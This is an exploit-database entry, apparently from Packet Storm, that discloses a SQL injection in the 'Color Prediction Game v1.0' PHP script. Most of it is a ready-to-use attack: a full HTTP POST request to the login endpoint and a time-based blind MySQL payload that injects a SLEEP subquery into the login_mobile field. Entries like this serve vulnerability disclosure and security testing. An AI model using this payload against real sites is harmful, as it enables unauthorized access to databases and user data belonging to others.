Share
## https://sploitus.com/exploit?id=PACKETSTORM:174260
# Exploit Title: Color Prediction Game v1.0 - SQL Injection  
# Date: 2023-08-12  
# Exploit Author: Ahmet รœmit BAYRAM  
# Vendor: https://www.codester.com/items/44411/color-prediction-game-php-script  
# Tested on: Kali Linux & MacOS  
# CVE: N/A  
  
### Request ###  
  
POST /loginNow.php HTTP/1.1  
Host: localhost  
Cookie: PHPSESSID=250594265b833a4d3a7adf6e1c136fe2  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0)  
Gecko/20100101 Firefox/116.0  
Accept: */*  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------395879129218961020344050490865  
Content-Length: 434  
Origin: http://localhost  
Referer: http://localhost/login.php  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: close  
-----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="login_mobile"  
4334343433  
-----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="login_password"  
123456  
-----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="action"  
login  
-----------------------------395879129218961020344050490865--  
  
### Parameter & Payloads ###  
Parameter: MULTIPART login_mobile ((custom) POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)  
Payload: -----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="login_mobile"  
4334343433' AND (SELECT 4472 FROM (SELECT(SLEEP(5)))UADa) AND 'PDLW'='PDLW  
-----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="login_password"  
123456  
-----------------------------395879129218961020344050490865  
Content-Disposition: form-data; name="action"  
login  
-----------------------------395879129218961020344050490865--